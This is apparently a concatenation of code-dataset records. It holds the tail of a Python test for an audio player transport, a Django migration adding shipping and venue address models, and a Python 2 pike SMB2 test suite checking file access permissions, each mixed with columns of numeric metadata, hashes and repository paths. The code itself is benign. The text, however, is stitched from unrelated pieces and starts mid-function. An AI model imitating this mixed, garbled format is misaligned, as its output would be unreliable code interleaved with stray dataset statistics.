Expect('stop', 'should call stop when pausing after track',
checks = lambda: (
# Allow test case to sync the middle of the test
done.set(),
),
),
Expect('start', 'should call start on play',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 2, 'should start playing second track'),
),
),
Expect('add_packet', 'should add first packet in second track',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
# State should have been updated
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.track, 2),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('add_packet', 'should add second packet in second track',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('drain', 'drain final track',
checks = lambda: (
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for first run state to update')
self.assertEqual(t.state.state, player.State.PAUSE,
'transport should be paused at end of first track')
self.assertEqual(t.state.track, 1),
self.assertEqual(t.state.position, 1, "position should be second packet"),
# Now hit play to keep playing second track
done.clear()
t.play()
# Wait for second run to finish
self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
def test_device_error_without_packet(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet, and get error in response',
checks = lambda packet, offset: (
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
),
ret = lambda packet, offset: (0, None, 'foobar'),
),
Expect('add_packet', 'should retry first packet after error',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertEqual(offset, 0),
self.assertEqual(t.state.error, 'Audio sink error: foobar',
'state.error should be set'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Now stop, so test doesn't run away
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to stop
t.stop(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP immediately, since this is a disruptive change'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
| 40.434077
| 108
| 0.502609
| 6,363
| 59,802
| 4.686311
| 0.047462
| 0.033603
| 0.051511
| 0.067608
| 0.867199
| 0.853114
| 0.846876
| 0.830678
| 0.821389
| 0.81542
| 0
| 0.006726
| 0.405772
| 59,802
| 1,478
| 109
| 40.461434
| 0.832395
| 0.085733
| 0
| 0.773529
| 0
| 0
| 0.199824
| 0.00055
| 0
| 0
| 0
| 0
| 0.261765
| 1
| 0.033333
| false
| 0.00098
| 0.011765
| 0.003922
| 0.061765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f25cfb5b20460f8317f3839c6e7302293d63d381
| 1,925
|
py
|
Python
|
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | null | null | null |
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | 6
|
2020-06-06T00:04:02.000Z
|
2021-09-22T19:05:03.000Z
|
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0 on 2020-06-12 07:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sale', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UnleashedShippingAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=50, null=True)),
('street', models.CharField(max_length=50, null=True)),
('town', models.CharField(max_length=50, null=True)),
('state', models.CharField(max_length=50, null=True)),
('postcode', models.CharField(max_length=8, null=True)),
('country', models.CharField(max_length=50, null=True)),
],
),
migrations.CreateModel(
name='UnleashedVenueAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=50, null=True)),
('street', models.CharField(max_length=50, null=True)),
('town', models.CharField(max_length=50, null=True)),
('state', models.CharField(max_length=50, null=True)),
('postcode', models.CharField(max_length=8, null=True)),
('country', models.CharField(max_length=50, null=True)),
],
),
migrations.AddField(
model_name='unleashedsalesorder',
name='customer_reference',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='unleashedsalesorder',
name='delivery_name',
field=models.CharField(max_length=20, null=True),
),
]
| 40.104167
| 114
| 0.572468
| 192
| 1,925
| 5.609375
| 0.302083
| 0.194986
| 0.233983
| 0.311978
| 0.766945
| 0.766945
| 0.766945
| 0.766945
| 0.610956
| 0.610956
| 0
| 0.032093
| 0.287792
| 1,925
| 47
| 115
| 40.957447
| 0.753465
| 0.022338
| 0
| 0.731707
| 1
| 0
| 0.112766
| 0.023936
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02439
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f277d3b74c3e5aa423c3e824b9a5302e6e0499ec
| 62,950
|
py
|
Python
|
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
#Copyright (C) Calsoft. All rights reserved.
#
# Module Name:
#
# create_open_additional.py
#
# Abstract:
#
# Additional test cases of Create open file
#
# Authors: Prayas Gupta (prayas.gupta@calsoftinc.com)
#
import pike.smb2
import pike.model
import pike.test
import re
import random
import array
import utils
class CreateOpen(pike.test.PikeTest):
def __init__(self, *args, **kwargs):
super(CreateOpen, self).__init__(*args, **kwargs)
self.buffer = "testing123456"
def test_open_file_append(self):
try:
print "----------------------------------"
print "TC001 - Open a file for append and try to read it.Should have read persmissions"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'create001.txt', access=pike.smb2.FILE_READ_DATA|pike.smb2.FILE_WRITE_DATA, options=pike.smb2.FILE_NON_DIRECTORY_FILE,disposition=pike.smb2.FILE_OPEN_IF).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Matching Bytes_read and Buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC001 has passed"
def test_open_file_without_read(self):
try:
print "----------------------------------"
print "TC002 - Open a file for append without read permissions. Try to read from the file."
expected_status = 'STATUS_ACCESS_DENIED'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'create002.txt', access=pike.smb2.FILE_WRITE_DATA, options=pike.smb2.FILE_NON_DIRECTORY_FILE,disposition=pike.smb2.FILE_OPEN_IF).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC002 has passed"
def test_open_file_execute(self):
try:
print "------------------------------------"
print "TC003 - open a file with execute and read it."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create003.txt',access=pike.smb2.FILE_WRITE_DATA ,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening file with FILE_EXECUTE"
file_handle1 = chan.create(tree,'Create003.txt',access=pike.smb2.FILE_EXECUTE,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file successful"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle1)
print "File handle closed successfully"
print "Matching Bytesread and buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC003 has passed"
def test_open_file_readattr(self):
try:
print "-------------------------------------"
print "TC004 - Open a file for read attr and try to read from the file"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create004.txt',access=pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_READ_DATA,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Querying the file"
conv_obj = utils.Convenience()
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan,query_packet)
info = res[0]
#info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
print "Querying file is successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
actual_status = str(info.status)
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC004 has passed"
def test_open_file_read_sync(self):
try:
print "--------------------------------------"
print "TC 005 - Open with read and sync set . Server should ignore sync and allow read."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create005.txt',access = pike.smb2.FILE_READ_DATA|pike.smb2.SYNCHRONIZE|pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Matching Bytesread and buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC005 has passed"
def test_open_file_all_cases(self):
try:
print "----------------------------------------"
print "TC006 - Open for all cases with desired access set to 0.See the server response."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create006.txt',access = 0,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "If file handle exists"
if isinstance(file_handle,pike.model.Open):
actual_status = "STATUS_SUCCESS"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC006 has passed"
def test_open_file_maxallowed_ro(self):
try:
print "-----------------------------------------"
print "TC007 - Open with Max_allowed flag on a RO file.Try writing data on the file"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create007.txt',access =pike.smb2.MAXIMUM_ALLOWED,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Querying the file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
print "Querying is successful"
file_attr = info.basic_information.file_attributes
print "File attribute is :",file_attr
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create007.txt',access =pike.smb2.MAXIMUM_ALLOWED,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file is successful"
print "Trying to write data"
bytes_written = chan.write(file_handle2,0,self.buffer)
print "Write data successful"
print "Trying to read data"
bytes_read = chan.read(file_handle2,len(self.buffer),0)
print "Read data successful"
print "Matching Byteswritten and Bytesread with buffer length"
if bytes_written == len(self.buffer) and len(bytes_read) == len(self.buffer):
actual_status = "STATUS_SUCCESS"
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC007 has passed"
def test_open_file_maxallowed_wo(self):
try:
print "------------------------------------------"
print "TC008 - Open a RO file with write permissions and try writing data "
expected_status = 'STATUS_ACCESS_DENIED'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create008.txt',access =pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create008.txt',access =pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file is successful"
print "Trying to write data"
bytes_written = chan.write(file_handle2,0,self.buffer)
print "Write data successful"
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC008 has passed"
def test_open_file_appenddata(self):
buffer2 = "@calsoft"
try:
print "----------------------------------------------"
print "TC009 - Open a file for append and append data"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create009.txt',access = pike.smb2.FILE_APPEND_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write data successful"
print "Close first handle"
chan.close(file_handle)
print "First handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create009.txt',access = pike.smb2.FILE_APPEND_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to append data"
bytes_written2 = chan.write(file_handle2,len(self.buffer),buffer2)
print "Append data successful"
final_buffer = len(self.buffer) + len(buffer2)
print "The final buffer length is :",final_buffer
final_bytes_written = int(bytes_written + bytes_written2)
print "The final buffer written length is :",final_bytes_written
print "Checking final buffer length and final buffer written length is equal or not"
if final_buffer == final_bytes_written:
actual_status = 'STATUS_SUCCESS'
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC009 has passed"
def test_open_file_write_ea(self):
try:
print "--------------------------------------"
print "TC 010 - Open a file that does not have permission to write-ea for write-ea "
easize = 0
expected_status = str(easize)
print "Expected status: ",expected_status
conv_obj=utils.Convenience()
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
create_tmp,create_resp = conv_obj.create(chan,tree,'Create10.txt',
access=pike.smb2.FILE_READ_EA | pike.smb2.FILE_READ_ATTRIBUTES,
attributes=pike.smb2.FILE_ATTRIBUTE_NORMAL,
disposition=pike.smb2.FILE_OPEN_IF,
options=pike.smb2.FILE_NON_DIRECTORY_FILE,
extended_attr={"Author":"Prayas"})
file = create_tmp.result()
print "File opening successful"
print "Querying the file and checking EA size value"
info = chan.query_file_info(file,pike.smb2.FILE_ALL_INFORMATION)
ea_size = info.ea_information.ea_size
print "The ea size of file is :",ea_size
actual_status = str(ea_size)
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC010 has passed"
def test_open_file_readattributes(self):
try:
print "-----------------------------------------"
print "TC 011 - Open a file to read attributes that has the proper permissions i.e FILE_READ_ATTRIBUTES."
expected_status = "FILE_ATTRIBUTE_ARCHIVE"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create011.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading file-attribute"
conv_obj = utils.Convenience()
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan,query_packet)
info = res[0]
file_attribute = info.children[0][0].basic_information.file_attributes
print "The file attributes is :",file_attribute
actual_status = str(file_attribute)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC011 has passed"
def test_open_file_without_readattributes(self):
try:
print "-----------------------------------------"
print "TC 012 - Open a file which does NOT have read attribute permission, and try to read attributes."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
conv_obj = utils.Convenience()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create012.txt',access = pike.smb2.FILE_WRITE_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to read attributes"
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan, query_packet)
info = res[0]
file_attribute = info.children[0][0].basic_information.file_attributes
print "The file attributes is :",file_attribute
actual_status = str(info.status)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC012 has passed"
def test_open_file_writeattributes(self):
try:
print "-------------------------------------------"
print "TC 013 - Open a file with perms(FILE_WRITE_ATTRIBUTES) to change attributes. Change some attribute of the file and save"
expected_status = "FILE_ATTRIBUTE_READONLY"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create013.txt',access = pike.smb2.FILE_WRITE_ATTRIBUTES|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to read the file attribute"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_old = info.basic_information.file_attributes
print "When file created file-attribute is :",file_create_attribute_old
print "Changing file-attribute to FILE_ATTRIBUTE_READONLY"
with chan.set_file_info(file_handle, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Checking file for changed attribute"
info1 = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_new = info1.basic_information.file_attributes
print "The changed attribute is : ",file_create_attribute_new
actual_status =str(file_create_attribute_new)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC013 has passed"
def test_open_file_without_writeattributes(self):
try:
print "-------------------------------------------"
print "TC 014 - Open a file which doesn't have perms(FILE_WRITE_ATTRIBUTES) to change attributes"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create014.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading the file attribute"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Trying to change file attribute"
with chan.set_file_info(file_handle, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC014 has passed"
def test_open_file_synchronize(self):
try:
print "-------------------------------------------"
print "TC 015 - Open a file with SYNCHRONIZE flag and verify server ignores this flag"
expected_status = "SYNCHRONIZE | FILE_READ_ATTRIBUTES"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create015.txt',access = pike.smb2.SYNCHRONIZE | pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading desired access of file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_desired_access = info.access_information.access_flags
print "The file got created and opened ignoring Desired access(SYNCHRONIZE) flag",file_desired_access
actual_status = str(file_desired_access)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC015 has passed"
def test_open_file_read_max_allowed(self):
buffer1 = "Calsoft"
try:
print "------------------------------------------"
print "TC 016 - Open a file that has file attribute = READONLY and desired access with maximum allowed and verify that only read is allowed and write fails"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create016.txt',access = pike.smb2.MAXIMUM_ALLOWED,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer writing successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
print "Opening file"
file_handle1 = chan.create(tree,'Create016.txt',access = pike.smb2.MAXIMUM_ALLOWED,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File opening successful"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
if len(bytes_read) == len(self.buffer):
print "Read data successful"
print "Trying to write data into file when file is open with attribute = FILE_ATTRIBUTE_READONLY"
bytes_written1 = chan.write(file_handle1,0,buffer1)
if bytes_written1 == len(buffer1):
print "Bytes write is successful"
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC016 has passed"
def test_open_file_append_write(self):
buffer2 = "@calsoft"
try:
print "-------------------------------------------"
print "TC 017 - Open a file with append and write permission with MAXIMUM ALLOWED flag."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create017.txt',access = pike.smb2.MAXIMUM_ALLOWED|pike.smb2.FILE_APPEND_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create017.txt',access = pike.smb2.MAXIMUM_ALLOWED|pike.smb2.FILE_APPEND_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File Open successful"
print "Trying to append buffer"
bytes_written2 = chan.write(file_handle1,14,buffer2)
print "Append data successful"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
final_buffer = len(self.buffer) + len(buffer2)
print "The final buffer length is :",final_buffer
final_bytes_written = int(bytes_written + bytes_written2)
print "The final buffer written length is :",final_bytes_written
print "Matching final buffer and final_bytes_written"
if final_buffer == final_bytes_written:
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC017 has passed"
def test_open_file_genericall_readonly(self):
try:
print "-------------------------------------------"
print "TC 018 - Open with generic all with read only permissions. Try to write the file."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create018.txt',access = pike.smb2.GENERIC_ALL,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create018.txt',access = pike.smb2.GENERIC_ALL,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File Open successful"
print "Trying to write data"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Buffer write successful"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e :
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
